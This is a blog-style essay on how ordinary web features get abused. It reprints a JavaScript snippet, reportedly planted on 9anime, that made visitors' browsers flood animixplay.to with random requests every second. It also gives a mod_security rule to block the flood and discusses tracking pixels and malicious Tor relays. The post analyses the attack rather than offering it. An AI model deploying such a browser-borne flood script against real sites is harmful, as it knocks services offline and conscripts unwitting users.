Abuse Analysis II

A few years ago, the website formerly known as 9anime was in a dispute over a fellow anime piracy site Animixplay, accusing the latter of scraping their content. While you may believe that these behind the scenes

// You know, you act like this for our system,
// then this just a gift back to you.
// I already message you but you ignored,
// so just play some games.
// Don't use CloudFlare's shield to handle it, use your brain if you have
setInterval(function fuckWithMe() {
    $.ajax('https://animixplay.to/search?' + randStr(10), {
    type: 'POST',
    data: {
        qfast: randStr(10);
        }
    });

    $.ajax('https://animixplay.to/?q=' + randStr(15));

    var d = {};
    d[randStr(10)] = randStr(10);
    $.ajax('https://animixplay.to/v1/' + randStr(10), {
        type: 'POST',
        data: d
        });
    }, 1e3);

Yes, this lovely piece of code will send a POST request every second to a, from thousands of users. If you visited 9anime while this script was active, you essentially signed up for a botnet and participated in a DDoS. Regardless, I think that this speaks to how poorly the web is equipped for security. This is not an exploit, nor is it undefined behavior - it’s just something that is emergent behavior of an Internet based around anonymous, unverified scripts that are automatically loaded and ran. There isn’t a real defense against this outside of blocking Javascript entirely, which renders the web unusable and is as such a non-starter for the vast majority of use cases.

There are even more innocuous behaviors that can be used maliciously. Once, I lost a paper and for some reason dumped my entire hard drive to an external HDD 1, including the ones that remained in memory but had yet to be overwritten. Perusing through the files, I saw all sorts of familiar thumbnails and images through my web browsing adventures, but what stuck out to me were the thousands of images that were just a single pixel of nothing.

As it turns out these images are trackers. They’re stored on a separate web server, and when your device makes a request to this server it’s sending data about your device to be logged. Once again, it baffles me that this is NOT an exploit but rather an emergent behavior of allowing cross-site requests. uBlock Origin doesn’t even have an option to block small media files (though it can block larger ones), so I can’t even defend against it that way.

I was very curious as to why this was attack was also framed as a challenge to the Animixplay administrators to defend against. I’m not a web administrator, so I can’t comment authoritatively on what the easy fix for this is without running to Cloudflare for a solution. I believe that because the format is known, you can simply block requests that follow that format (e.g. POST with a body of length 10) with something like mod_security for an Apache server.

SecRule REQUEST_METHOD "^POST$" "id:1,chain,phase:2,deny"
SecRule REQUEST_BODY_LENGTH "@eq 10"

I think the most absurd story for me occurred in 2021, where a research found that 25% of Tor’s nodes were operated by a single group. With that malicious actor’s position they staged sophisticated man-in-the-middle attacks to strip encryption from websites and modifying Bitcoin addresses to point to their own. I don’t want to give the impression that Tor is as a whole untenable. It is likely fine for the majority of privacy-conscious users, but I want to dispel the idea that there is a silver bullet for security outside of dismantling your router. The best thing you can do is to disable Javascript and minimize the number of critical uses of Internet.

Footnotes:

1

Okay, in actuality I stopped 40 minutes in after realizing that this was a terrible idea that would take forever.